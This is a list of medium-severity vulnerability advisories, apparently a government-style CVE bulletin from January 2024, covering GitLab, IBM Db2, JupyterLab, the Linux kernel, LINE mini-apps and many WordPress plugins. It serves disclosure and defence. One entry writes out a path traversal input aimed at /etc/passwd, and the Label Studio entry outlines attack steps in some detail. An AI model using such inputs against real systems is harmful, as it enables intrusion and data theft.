factominer — factoinvestigate | A vulnerability, which was classified as problematic, was found in FactoMineR FactoInvestigate up to 1.9. Affected is an unknown function of the component HTML Report Generator. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251544. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-19 | 6.1 | CVE-2024-0720 [email protected] [email protected] [email protected] |
flink-extended — ai-flow | A vulnerability was found in flink-extended ai-flow 0.3.1. It has been declared as critical. Affected by this vulnerability is the function cloudpickle.loads of the file \ai_flow\cli\commands\workflow_command.py. The manipulation leads to deserialization. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-252205 was assigned to this vulnerability. | 2024-01-27 | 5 | CVE-2024-0960 [email protected] [email protected] [email protected] [email protected] |
fusionpbx — fusionpbx | FusionPBX prior to 5.1.0 contains a cross-site scripting vulnerability. If this vulnerability is exploited by a remote authenticated attacker with an administrative privilege, an arbitrary script may be executed on the web browser of the user who is logging in to the product. | 2024-01-19 | 4.8 | CVE-2024-23387 [email protected] [email protected] [email protected] |
gitlab — gitlab | An issue has been discovered in GitLab CE/EE affecting all versions after 13.7 before 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1. Improper input sanitization of user name allows arbitrary API PUT requests. | 2024-01-26 | 6.4 | CVE-2023-5933 [email protected] [email protected] [email protected] |
gitlab — gitlab | An issue has been discovered in GitLab CE/EE affecting all versions from 12.7 prior to 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1 It was possible for an attacker to trigger a Regular Expression Denial of Service via a `Cargo.toml` containing maliciously crafted input. | 2024-01-26 | 6.5 | CVE-2023-6159 [email protected] [email protected] [email protected] |
gitlab — gitlab | An issue has been discovered in GitLab affecting all versions before 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1. It was possible to read the user email address via tags feed although the visibility in the user profile has been disabled. | 2024-01-26 | 5.3 | CVE-2023-5612 [email protected] [email protected] [email protected] |
gitlab — gitlab | An authorization vulnerability exists in GitLab versions 14.0 prior to 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1. An unauthorized attacker is able to assign arbitrary users to MRs that they created within the project | 2024-01-26 | 4.3 | CVE-2024-0456 [email protected] [email protected] |
go4rayyan — scumblr | A vulnerability, which was classified as problematic, has been found in go4rayyan Scumblr up to 2.0.1a. Affected by this issue is some unknown functionality of the component Task Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version 2.0.2 is able to address this issue. The patch is identified as 5c9120f2362ddb7cbe48f2c4620715adddc4ee35. It is recommended to upgrade the affected component. VDB-251570 is the identifier assigned to this vulnerability. | 2024-01-21 | 6.1 | CVE-2016-15037 [email protected] [email protected] [email protected] [email protected] |
gravitymaster — product_enquiry_for_woocommerce | The Product Enquiry for WooCommerce WordPress plugin before 3.1 does not have a CSRF check in place when deleting inquiries, which could allow attackers to make a logged in admin delete them via a CSRF attack | 2024-01-22 | 4.3 | CVE-2023-6625 [email protected] |
gravitymaster — product_enquiry_for_woocommerce | The Product Enquiry for WooCommerce WordPress plugin before 3.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) | 2024-01-22 | 4.8 | CVE-2023-6626 [email protected] |
hewlett_packard_enterprise — hpe_oneview | HPE OneView may have a missing passphrase during restore. | 2024-01-23 | 5.5 | CVE-2023-6573 [email protected] |
hongmaple — octopus | A vulnerability was found in hongmaple octopus 1.0. It has been classified as critical. Affected is an unknown function of the file /system/role/list. The manipulation of the argument dataScope leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. This product is using a rolling release to provide continuous delivery. Therefore, no version details for affected nor updated releases are available. The identifier of this vulnerability is VDB-251700. | 2024-01-22 | 6.3 | CVE-2024-0784 [email protected] [email protected] [email protected] |
hongmaple — octopus | A vulnerability was found in hongmaple octopus 1.0. It has been classified as critical. Affected is an unknown function of the file /system/dept/edit. The manipulation of the argument ancestors leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Continuous delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. VDB-252042 is the identifier assigned to this vulnerability. | 2024-01-25 | 6.3 | CVE-2024-0890 [email protected] [email protected] [email protected] |
honojs — node-server | @hono/node-server is an adapter that allows users to run Hono applications on Node.js. Since v1.3.0, @hono/node-server has used its own Request object with `url` behavior that is unexpected. In the standard API, if the URL contains `..`, here called “double dots”, the URL string returned by Request will be in the resolved path. However, the `url` in @hono/node-server’s Request as does not resolve double dots, so `http://localhost/static/.. /foo.txt` is returned. This causes vulnerabilities when using `serveStatic`. Modern web browsers and a latest `curl` command resolve double dots on the client side, so this issue doesn’t affect those using either of those tools. However, problems may occur if accessed by a client that does not resolve them. Version 1.4.1 includes the change to fix this issue. As a workaround, don’t use `serveStatic`. | 2024-01-22 | 5.3 | CVE-2024-23340 [email protected] [email protected] [email protected] |
humansignal — label-studio | Label Studio, an open source data labeling tool had a remote import feature allowed users to import data from a remote web source, that was downloaded and could be viewed on the website. Prior to version 1.10.1, this feature could had been abused to download a HTML file that executed malicious JavaScript code in the context of the Label Studio website. Executing arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image. For an example, an attacker can craft a JavaScript payload that adds a new Django Super Administrator user if a Django administrator visits the image. `data_import/uploader.py` lines 125C5 through 146 showed that if a URL passed the server side request forgery verification checks, the contents of the file would be downloaded using the filename in the URL. The downloaded file path could then be retrieved by sending a request to `/api/projects/{project_id}/file-uploads?ids=[{download_id}]` where `{project_id}` was the ID of the project and `{download_id}` was the ID of the downloaded file. Once the downloaded file path was retrieved by the previous API endpoint, `data_import/api.py`lines 595C1 through 616C62 demonstrated that the `Content-Type` of the response was determined by the file extension, since `mimetypes.guess_type` guesses the `Content-Type` based on the file extension. Since the `Content-Type` was determined by the file extension of the downloaded file, an attacker could import in a `.html` file that would execute JavaScript when visited. Version 1.10.1 contains a patch for this issue. Other remediation strategies are also available. For all user provided files that are downloaded by Label Studio, set the `Content-Security-Policy: sandbox;` response header when viewed on the site. The `sandbox` directive restricts a page’s actions to prevent popups, execution of plugins and scripts and enforces a `same-origin` policy. Alternatively, restrict the allowed file extensions that may be downloaded. | 2024-01-24 | 4.7 | CVE-2024-23633 [email protected] [email protected] [email protected] [email protected] |
i3thuan5 — tuitse-tsusin | TuiTse-TsuSin is a package for organizing the comparative corpus of Taiwanese Chinese characters and Roman characters, and extracting sentences of the Taiwanese Chinese characters and the Roman characters. Prior to version 1.3.2, when using `tuitse_html` without quoting the input, there is a html injection vulnerability. Version 1.3.2 contains a patch for the issue. As a workaround, sanitize Taigi input with HTML quotation. | 2024-01-23 | 6.1 | CVE-2024-23341 [email protected] [email protected] [email protected] |
ibm — db2 | IBM Db2 10.1, 10.5, and 11.1 could allow a remote user to execute arbitrary code caused by installing like named jar files across multiple databases. A user could exploit this by installing a malicious jar file that overwrites the existing like named jar file in another database. IBM X-Force ID: 249205. | 2024-01-22 | 6.5 | CVE-2023-27859 [email protected] [email protected] |
ibm — db2 | IIBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.5 could allow an authenticated user with CONNECT privileges to cause a denial of service using a specially crafted query. IBM X-Force ID: 270264. | 2024-01-22 | 6.5 | CVE-2023-47141 [email protected] [email protected] |
ibm — db2 | IBM DB2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.1, 10.5, and 11.1 could allow an authenticated user with CONNECT privileges to cause a denial of service using a specially crafted query. IBM X-Force ID: 270750. | 2024-01-22 | 6.5 | CVE-2023-47158 [email protected] [email protected] |
ibm — db2 | IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 could allow an authenticated user with CONNECT privileges to cause a denial of service using a specially crafted query. IBM X-Force ID: 272644. | 2024-01-22 | 6.5 | CVE-2023-47746 [email protected] [email protected] |
ibm — db2 | IBM DB2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.1, 10.5, and 11.1 could allow an authenticated user with CONNECT privileges to cause a denial of service using a specially crafted query. IBM X-Force ID: 272646. | 2024-01-22 | 6.5 | CVE-2023-47747 [email protected] [email protected] |
ibm — db2 | IBM Db2 for Linux, UNIX and Windows (includes DB2 Connect Server) 11.5 under certain circumstances could allow an authenticated user to the database to cause a denial of service when a statement is run on columnar tables. IBM X-Force ID: 273393. | 2024-01-22 | 6.5 | CVE-2023-50308 [email protected] [email protected] |
ibm — maximo_application_suite | IBM Maximo Spatial Asset Management 8.10 is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. IBM X-Force ID: 255288. | 2024-01-19 | 5.4 | CVE-2023-32337 [email protected] [email protected] |
ibm — sterling_control_center | IBM Sterling Control Center 6.3.0 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing “dot dot” sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 257874. | 2024-01-19 | 5.3 | CVE-2023-35020 [email protected] [email protected] |
ibm — storage_defender_data_protect | IBM Storage Defender – Data Protect 1.0.0 through 1.4.1 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. IBM X-Force ID: 276101. | 2024-01-19 | 5.4 | CVE-2023-50963 [email protected] [email protected] |
icehrm — icehrm | IceHrm 23.0.0.OS does not sufficiently encode user-controlled input, which creates a Cross-Site Scripting (XSS) vulnerability via /icehrm/app/fileupload_page.php, in multiple parameters. An attacker could exploit this vulnerability by sending a specially crafted JavaScript payload and partially hijacking the victim’s browser. | 2024-01-25 | 5.4 | CVE-2023-6282 [email protected] |
ignazio_scimone — albo_pretorio_on_line | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Ignazio Scimone Albo Pretorio On line.This issue affects Albo Pretorio On line: from n/a through 4.6.6. | 2024-01-24 | 5.3 | CVE-2024-22301 [email protected] |
intel — HIDPevent_filter | Insecure inherited permissions in some Intel HID Event Filter drivers for Windows 10 for some Intel NUC laptop software installers before version 2.2.2.1 may allow an authenticated user to potentially enable escalation of privilege via local access. | 2024-01-19 | 6.7 | CVE-2023-38541 [email protected] |
intel — integrated_sensor_hub | Incorrect default permissions in some Intel Integrated Sensor Hub (ISH) driver for Windows 10 for Intel NUC P14E Laptop Element software installers before version 5.4.1.4479 may allow an authenticated user to potentially enable escalation of privilege via local access. | 2024-01-19 | 6.7 | CVE-2023-29244 [email protected] |
intel — nuc_bios | Improper buffer restrictions for some Intel NUC BIOS firmware before version IN0048 may allow a privileged user to potentially enable escalation of privilege via local access. | 2024-01-19 | 6.7 | CVE-2023-28722 [email protected] |
iobit — iobit_malware_fighter | IObit Malware Fighter v11.0.0.1274 is vulnerable to a Denial of Service vulnerability by triggering the 0x8001E00C IOCTL code of the ImfHpRegFilter.sys driver. | 2024-01-22 | 5.5 | CVE-2024-0430 [email protected] [email protected] |
ip2location — ip2location_country_blocker | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in IP2Location IP2Location Country Blocker. This issue affects IP2Location Country Blocker: from n/a through 2.33.3. | 2024-01-24 | 5.3 | CVE-2024-22294 [email protected] |
ipb-halle — molecularfaces | MolecularFaces before 0.3.0 is vulnerable to cross site scripting. A remote attacker can execute arbitrary JavaScript in the context of a victim browser via crafted molfiles. | 2024-01-19 | 6.1 | CVE-2024-0758 [email protected] [email protected] [email protected] |
jspxcms — jspxcms | A vulnerability has been found in Jspxcms 10.2.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Survey Label Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251545 was assigned to this vulnerability. | 2024-01-19 | 6.1 | CVE-2024-0721 [email protected] [email protected] [email protected] |
juniper_networks — junos_os | A Missing Authentication for Critical Function vulnerability combined with a Generation of Error Message Containing Sensitive Information vulnerability in J-Web of Juniper Networks Junos OS on SRX Series and EX Series allows an unauthenticated, network-based attacker to access sensitive system information. When a user logs in, a temporary file which contains the configuration of the device (as visible to that user) is created in the /cache folder. An unauthenticated attacker can then attempt to access such a file by sending a specific request to the device trying to guess the name of such a file. Successful exploitation will reveal configuration information. This issue affects Juniper Networks Junos OS on SRX Series and EX Series: * All versions earlier than 20.4R3-S9; * 21.2 versions earlier than 21.2R3-S7; * 21.3 versions earlier than 21.3R3-S5; * 21.4 versions earlier than 21.4R3-S6; * 22.1 versions earlier than 22.1R3-S5; * 22.2 versions earlier than 22.2R3-S3; * 22.3 versions earlier than 22.3R3-S2; * 22.4 versions earlier than 22.4R3; * 23.2 versions earlier than 23.2R1-S2, 23.2R2. | 2024-01-25 | 5.3 | CVE-2024-21619 [email protected] |
jupyter — jupyterlab | JupyterLab is an extensible environment for interactive and reproducible computing, based on the Jupyter Notebook and Architecture. This vulnerability depends on user interaction by opening a malicious Markdown file using JupyterLab preview feature. A malicious user can access any data that the attacked user has access to as well as perform arbitrary requests acting as the attacked user. JupyterLab version 4.0.11 has been patched. Users are advised to upgrade. Users unable to upgrade should disable the table of contents extension. | 2024-01-19 | 6.1 | CVE-2024-22420 [email protected] [email protected] |
jupyter — jupyterlab | JupyterLab is an extensible environment for interactive and reproducible computing, based on the Jupyter Notebook and Architecture. Users of JupyterLab who click on a malicious link may get their `Authorization` and `XSRFToken` tokens exposed to a third party when running an older `jupyter-server` version. JupyterLab versions 4.1.0b2, 4.0.11, and 3.6.7 are patched. No workaround has been identified, however users should ensure to upgrade `jupyter-server` to version 2.7.2 or newer which includes a redirect vulnerability fix. | 2024-01-19 | 6.5 | CVE-2024-22421 [email protected] [email protected] |
kmint21 — golden_ftp_server | A vulnerability was found in Kmint21 Golden FTP Server 2.02b and classified as problematic. This issue affects some unknown processing of the component PASV Command Handler. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252041 was assigned to this vulnerability. | 2024-01-25 | 5.3 | CVE-2024-0889 [email protected] [email protected] [email protected] |
lantronix — xport | Lantronix XPort sends weakly encoded credentials within web request headers. | 2024-01-23 | 5.7 | CVE-2023-7237 [email protected] [email protected] |
lenovo — app_store | An incorrect permissions vulnerability was reported in the Lenovo App Store app that could allow an attacker to use system resources, resulting in a denial of service. | 2024-01-19 | 5.5 | CVE-2023-6450 [email protected] |
lenovo — vantage | A privilege escalation vulnerability was reported in Lenovo Vantage that could allow a local attacker with physical access to impersonate Lenovo Vantage Service and execute arbitrary code with elevated privileges. | 2024-01-19 | 6.8 | CVE-2023-6044 [email protected] |
linecorp — line | An issue in nature fitness saijo mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-24 | 5.4 | CVE-2023-43988 [email protected] |
linecorp — line | An issue in mokumoku chohu mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-24 | 5.4 | CVE-2023-43989 [email protected] |
linecorp — line | An issue in cherub-hair mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-24 | 5.4 | CVE-2023-43990 [email protected] |
linecorp — line | An issue in PRIMA CLINIC mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-24 | 5.4 | CVE-2023-43991 [email protected] |
linecorp — line | An issue in STOCKMAN GROUP mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-24 | 5.4 | CVE-2023-43992 [email protected] |
linecorp — line | An issue in smaregi_app_market mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-24 | 5.4 | CVE-2023-43993 [email protected] |
linecorp — line | An issue in Cleaning_makotoya mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-24 | 5.4 | CVE-2023-43994 [email protected] |
linecorp — line | An issue in picot.golf mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-24 | 5.4 | CVE-2023-43995 [email protected] |
linecorp — line | An issue in Q co ltd mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-24 | 5.4 | CVE-2023-43996 [email protected] |
linecorp — line | An issue in Yoruichi hobby base mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-24 | 5.4 | CVE-2023-43997 [email protected] |
linecorp — line | An issue in Books-futaba mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-24 | 5.4 | CVE-2023-43998 [email protected] |
linecorp — line | An issue in COLORFUL_laundry mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-24 | 5.4 | CVE-2023-43999 [email protected] |
linecorp — line | An issue in Otakara lapis totuka mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-24 | 5.4 | CVE-2023-44000 [email protected] |
linecorp — line | An issue in Ailand clinic mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-24 | 5.4 | CVE-2023-44001 [email protected] |
linux — kernel | A use-after-free flaw was found in the __ext4_remount in fs/ext4/super.c in ext4 in the Linux kernel. This flaw allows a local user to cause an information leak problem while freeing the old quota file names before a potential failure, leading to a use-after-free. | 2024-01-22 | 6.7 | CVE-2024-0775 [email protected] [email protected] [email protected] |
linux — kernel | NULL Pointer Dereference vulnerability in Linux Linux kernel kernel on Linux, x86, ARM (net, bluetooth modules) allows Overflow Buffers. This vulnerability is associated with program files /net/bluetooth/rfcomm/core.C. This issue affects Linux kernel: v2.6.12-rc2. | 2024-01-25 | 6.3 | CVE-2024-22099 [email protected] |
linux — kernel | An out-of-bounds read vulnerability was found in Netfilter Connection Tracking (conntrack) in the Linux kernel. This flaw allows a remote user to disclose sensitive information via the DCCP protocol. | 2024-01-23 | 4 | CVE-2023-39197 [email protected] [email protected] |
linux — kernel | Integer Overflow or Wraparound vulnerability in Linux Linux kernel kernel on Linux, x86, ARM (md, raid, raid5 modules) allows Forced Integer Overflow. | 2024-01-25 | 4.4 | CVE-2024-23307 [email protected] |
liuwy-dlsdys — zhglxt | A vulnerability, which was classified as problematic, has been found in liuwy-dlsdys zhglxt 4.7.7. This issue affects some unknown processing of the file /oa/notify/edit of the component HTTP POST Request Handler. The manipulation of the argument notifyTitle leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251543. | 2024-01-19 | 4.8 | CVE-2024-0718 [email protected] [email protected] [email protected] |
lizard-ware — spycamlizard | A vulnerability classified as problematic has been found in SpyCamLizard 1.230. Affected is an unknown function of the component HTTP GET Request Handler. The manipulation leads to denial of service. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252036. | 2024-01-25 | 5.3 | CVE-2024-0885 [email protected] [email protected] [email protected] |
ljapps — wp_review_slider | The WP Review Slider WordPress plugin before 13.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) | 2024-01-22 | 4.8 | CVE-2023-6456 [email protected] |
mafiatic — blue_server | A vulnerability, which was classified as problematic, has been found in Mafiatic Blue Server 1.1. Affected by this issue is some unknown functionality of the component Connection Handler. The manipulation leads to denial of service. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252038 is the identifier assigned to this vulnerability. | 2024-01-25 | 5.3 | CVE-2024-0887 [email protected] [email protected] [email protected] |
martinmbithi — internet_banking_system | A vulnerability classified as problematic was found in CodeAstro Internet Banking System 1.0. Affected by this vulnerability is an unknown functionality of the file pages_client_signup.php. The manipulation of the argument Client Full Name leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251677 was assigned to this vulnerability. | 2024-01-22 | 5.4 | CVE-2024-0773 [email protected] [email protected] [email protected] |
meris_wp_theme_project — meris_wp_theme | The Meris WordPress theme through 1.1.2 does not sanitise and escape some parameters before outputting them back in the page, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin | 2024-01-22 | 6.1 | CVE-2023-7194 [email protected] |
metagauss — eventprime | The EventPrime WordPress plugin before 3.3.6 lacks authentication and authorization, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id/event name. | 2024-01-22 | 5.3 | CVE-2023-6447 [email protected] |
microsoft — microsoft_edge_(chromium-based) | Microsoft Edge for Android Spoofing Vulnerability | 2024-01-26 | 5.3 | CVE-2024-21387 [email protected] |
microsoft — microsoft_edge_(chromium-based) | Microsoft Edge for Android Information Disclosure Vulnerability | 2024-01-26 | 4.3 | CVE-2024-21382 [email protected] |
mintplex-labs — vector-admin | Authentication bypass in vector-admin allows a user to register to a vector-admin server while “domain restriction” is active, even when not owning an authorized email address. | 2024-01-25 | 6.5 | CVE-2024-0879 [email protected] [email protected] |
myeventon — rsvp_events | The EventON-RSVP WordPress plugin before 2.9.5 does not sanitise and escape some parameters before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin | 2024-01-22 | 6.1 | CVE-2023-7170 [email protected] |
niushop — b2b2c | A vulnerability was found in Niushop B2B2C V5 and classified as critical. Affected by this issue is some unknown functionality of the file \app\model\Upload.php. The manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252140. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 6.3 | CVE-2024-0933 [email protected] [email protected] [email protected] |
novel-plus — novel-plus | A vulnerability was found in Novel-Plus 4.3.0-RC1 and classified as critical. This issue affects some unknown processing of the file /novel/bookComment/list. The manipulation of the argument sort leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-252185 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 5.5 | CVE-2024-0941 [email protected] [email protected] [email protected] |
nsasoft — sharealarmpro | A vulnerability was found in Nsasoft ShareAlarmPro 2.1.4 and classified as problematic. Affected by this issue is some unknown functionality of the component Registration Handler. The manipulation of the argument Name/Key leads to memory corruption. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251672. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-22 | 5.3 | CVE-2024-0772 [email protected] [email protected] [email protected] |
nsasoft– product_key_explorer | A vulnerability has been found in Nsasoft Product Key Explorer 4.0.9 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Registration Handler. The manipulation of the argument Name/Key leads to memory corruption. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251671. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-21 | 5.3 | CVE-2024-0771 [email protected] [email protected] [email protected] |
obgm — libcoap | A vulnerability was found in obgm libcoap 4.3.4. It has been rated as critical. Affected by this issue is the function get_split_entry of the file src/coap_oscore.c of the component Configuration File Handler. The manipulation leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. VDB-252206 is the identifier assigned to this vulnerability. | 2024-01-27 | 6.3 | CVE-2024-0962 [email protected] [email protected] [email protected] [email protected] [email protected] |
openfga — openfga | OpenFGA, an authorization/permission engine, is vulnerable to a denial of service attack in versions prior to 1.4.3. In some scenarios that depend on the model and tuples used, a call to `ListObjects` may not release memory properly. So when a sufficiently high number of those calls are executed, the OpenFGA server can create an `out of memory` error and terminate. Version 1.4.3 contains a patch for this issue. | 2024-01-26 | 5.3 | CVE-2024-23820 [email protected] [email protected] [email protected] |
openlibraryfoundation — mod-remote-storage | Hard-coded credentials in mod-remote-storage versions under 1.7.2 and from 2.0.0 to 2.0.3 allows unauthorized users to gain read access to mod-inventory-storage records including instances, holdings, items, contributor-types, and identifier-types. | 2024-01-19 | 5.3 | CVE-2024-23685 [email protected] [email protected] [email protected] [email protected] [email protected] |
owasp — dependency-check | DependencyCheck for Maven 9.0.0 to 9.0.6, for CLI version 9.0.0 to 9.0.5, and for Ant versions 9.0.0 to 9.0.5, when used in debug mode, allows an attacker to recover the NVD API Key from a log file. | 2024-01-19 | 5.3 | CVE-2024-23686 [email protected] [email protected] [email protected] |
project_worlds — online_admission_system | A vulnerability was found in Project Worlds Online Admission System 1.0 and classified as critical. This issue affects some unknown processing of the file documents.php. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251699. | 2024-01-22 | 6.3 | CVE-2024-0783 [email protected] [email protected] [email protected] [email protected] |
qidianbang — qdbcrm | A vulnerability was found in Qidianbang qdbcrm 1.1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /user/edit?id=2 of the component Password Reset. The manipulation leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252032. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-25 | 4.3 | CVE-2024-0880 [email protected] [email protected] [email protected] |
qwdigital — linkwechat | A vulnerability was found in qwdigital LinkWechat 5.1.0. It has been classified as problematic. This affects an unknown part of the file /linkwechat-api/common/download/resource of the component Universal Download Interface. The manipulation of the argument name with the input /profile/../../../../../etc/passwd leads to path traversal: ‘../filedir’. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252033 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-25 | 4.3 | CVE-2024-0882 [email protected] [email protected] [email protected] |
renzo_johnson — contact_form_7_extension_for_mailchimp | Server-Side Request Forgery (SSRF) vulnerability in Renzo Johnson Contact Form 7 Extension For Mailchimp.This issue affects Contact Form 7 Extension For Mailchimp: from n/a through 0.5.70. | 2024-01-24 | 4.9 | CVE-2024-22134 [email protected] |
revenera — installshield | A vulnerability has been reported in Suite Setups built with versions prior to InstallShield 2023 R2. This vulnerability may allow locally authenticated users to cause a Denial of Service (DoS) condition when handling move operations on local, temporary folders. | 2024-01-26 | 5.5 | CVE-2023-29081 [email protected] |
silverstripe — silverstripe-admin | Silverstripe Admin provides a basic management interface for the Silverstripe Framework. In versions on the 1.x branch prior to 1.13.19 and on the 2.x branch prior to 2.1.8, users who don’t have edit or delete permissions for records exposed in a `ModelAdmin` can still edit or delete records using the CSV import form, provided they have create permissions. The likelihood of a user having create permissions but not having edit or delete permissions is low, but it is possible. Note that this doesn’t affect any `ModelAdmin` which has had the import form disabled via the `showImportForm` public property. Versions 1.13.19 and 2.1.8 contain a patch for the issue. Those who have a custom implementation of `BulkLoader` should update their implementations to respect permissions when the return value of `getCheckPermissions()` is true. Those who use any `BulkLoader` in their own project logic, or maintain a module which uses it, should consider passing `true` to `setCheckPermissions()` if the data is provided by users. | 2024-01-23 | 4.3 | CVE-2023-49783 [email protected] [email protected] |
silverstripe — silverstripe-framework | Silverstripe Framework is the framework that forms the base of the Silverstripe content management system. Prior to versions 4.13.39 and 5.1.11, if a user should not be able to see a record, but that record can be added to a `GridField` using the `GridFieldAddExistingAutocompleter` component, the record’s title can be accessed by that user. Versions 4.13.39 and 5.1.11 contain a fix for this issue. | 2024-01-23 | 4.3 | CVE-2023-48714 [email protected] [email protected] |
silverstripe — silverstripe-graphql | The Silverstripe CMS GraphQL Server serves Silverstripe data as GraphQL representations. In versions 4.0.0 prior to 4.3.7 and 5.0.0 prior to 5.1.3, `canView` permission checks are bypassed for ORM data in paginated GraphQL query results where the total number of records is greater than the number of records per page. Note that this also affects GraphQL queries which have a limit applied, even if the query isn’t paginated per se. This has been fixed in versions 4.3.7 and 5.1.3 by ensuring no new records are pulled in from the database after performing `canView` permission checks for each page of results. This may result in some pages in the query results having less than the maximum number of records per page even when there are more pages of results. This behavior is consistent with how pagination works in other areas of Silverstripe CMS, such as in `GridField`, and is a result of having to perform permission checks in PHP rather than in the database directly. One may disable these permission checks by disabling the `CanViewPermission` plugin. | 2024-01-23 | 5.3 | CVE-2023-44401 [email protected] [email protected] |
sourcecodester — online_tours_&_travels_management_system | A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been declared as critical. This vulnerability affects the function prepare of the file admin/pay.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-252034 is the identifier assigned to this vulnerability. | 2024-01-25 | 6.3 | CVE-2024-0883 [email protected] [email protected] [email protected] |
sourcecodester — online_tours_&_travels_management_system | A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been rated as critical. This issue affects the function exec of the file payment.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252035. | 2024-01-25 | 4.7 | CVE-2024-0884 [email protected] [email protected] [email protected] |
spip — spip | SPIP before 4.1.14 and 4.2.x before 4.2.8 allows XSS via the name of an uploaded file. This is related to javascript/bigup.js and javascript/bigup.utils.js. | 2024-01-19 | 6.1 | CVE-2024-23659 [email protected] [email protected] [email protected] |
splunk — splunk_enterprise | In Splunk Enterprise versions below 9.0.8 and 9.1.3, Splunk app key value store (KV Store) improperly handles permissions for users that use the REST application programming interface (API). This can potentially result in the deletion of KV Store collections. | 2024-01-22 | 6.5 | CVE-2024-23675 [email protected] [email protected] |
